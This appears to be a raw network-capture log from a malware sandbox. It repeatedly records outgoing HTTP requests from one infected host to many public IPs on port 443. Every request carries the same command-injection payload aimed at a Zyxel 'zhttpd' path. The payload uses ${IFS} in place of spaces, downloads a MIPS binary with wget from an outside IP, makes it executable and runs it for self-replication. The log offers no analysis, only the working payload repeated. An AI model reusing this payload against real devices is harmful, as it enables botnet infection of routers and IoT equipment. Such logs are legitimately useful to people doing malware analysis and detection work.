                                              Jan 29, 2024 07:04:06.322731018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8286192.168.2.145721885.60.121.68443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.322782993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8287192.168.2.1459038119.134.255.160443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.322832108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8288192.168.2.1456464218.238.169.203443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.322871923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8289192.168.2.14563605.145.187.237443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.322927952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8290192.168.2.1441658141.31.168.208443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.322948933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8291192.168.2.1448520125.143.190.148443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.323016882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8292192.168.2.14382562.221.182.126443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.323071957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8293192.168.2.1442136197.147.216.207443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.323100090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8294192.168.2.14356781.142.74.222443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.323137999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8295192.168.2.1456428208.229.228.14443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.323187113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8296192.168.2.1457838120.152.79.63443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.323211908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8297192.168.2.1445932151.3.25.255443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.323287964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8298192.168.2.1451210149.23.28.31443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.323307991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8299192.168.2.1447078190.143.95.215443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.323359966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8300192.168.2.144714685.199.195.227443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.323378086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8301192.168.2.1445890104.105.4.222443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.323430061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8302192.168.2.143766482.24.185.217443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.323450089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8303192.168.2.1447846125.213.232.112443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.323471069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8304192.168.2.1432908129.240.222.229443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.323532104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8305192.168.2.1450002100.156.92.57443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.323559046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8306192.168.2.144318673.15.163.91443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.323627949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8307192.168.2.1435004181.216.182.198443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.323678970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8308192.168.2.1444076168.37.90.44443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.323699951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8309192.168.2.145021824.171.145.192443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.323734999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8310192.168.2.145462494.32.3.149443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.323796988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8311192.168.2.143459441.76.47.163443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.323838949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8312192.168.2.145775839.204.0.167443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.323878050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8313192.168.2.1439066173.115.70.154443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.323924065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8314192.168.2.145114086.72.71.188443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.323961973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8315192.168.2.1460386106.164.46.38443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.324007034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8316192.168.2.143796897.60.196.67443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.324031115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8317192.168.2.1435886216.170.230.196443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.324071884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8318192.168.2.144255044.204.194.222443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.324114084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8319192.168.2.143855652.77.204.119443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.324157000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8320192.168.2.144838293.109.61.153443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.324208021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8321192.168.2.144697691.73.29.231443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.324240923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8322192.168.2.145085041.73.90.238443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.324268103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8323192.168.2.143587879.74.11.25443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.324309111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8324192.168.2.1439666137.186.161.67443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.324358940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8325192.168.2.1444984121.159.101.166443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.324382067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8326192.168.2.143926275.61.184.76443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.324409008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8327192.168.2.1437362109.215.251.16443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.324434042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8328192.168.2.1448608178.81.76.60443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.324503899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8329192.168.2.1444534126.17.19.172443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.324537039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8330192.168.2.143791850.137.177.46443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.324573040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8331192.168.2.144005423.137.183.85443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.324599028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8332192.168.2.1437242205.201.88.159443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.324655056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8333192.168.2.1451316182.102.53.178443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.324691057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8334192.168.2.1456698163.201.185.96443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.324706078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8335192.168.2.1448278155.92.110.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.324749947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8336192.168.2.1459568164.233.138.201443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.324770927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8337192.168.2.1441694188.53.124.43443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.324835062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8338192.168.2.1440156178.4.49.40443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.324876070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8339192.168.2.1446534126.39.154.82443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.324898005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8340192.168.2.1435836184.125.113.114443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.324943066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8341192.168.2.1438768132.16.117.150443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.325000048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8342192.168.2.1456416189.175.134.26443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.325014114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8343192.168.2.145177476.132.147.31443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.325068951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8344192.168.2.1438246198.84.236.209443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.325087070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8345192.168.2.144142257.10.206.214443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.325155020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8346192.168.2.144984412.195.47.42443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.325177908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8347192.168.2.1445420191.35.94.7443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.325225115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8348192.168.2.143771662.31.22.238443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.325248957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8349192.168.2.1434256147.210.50.33443
                                              TimestampBytes transferredDirectionData
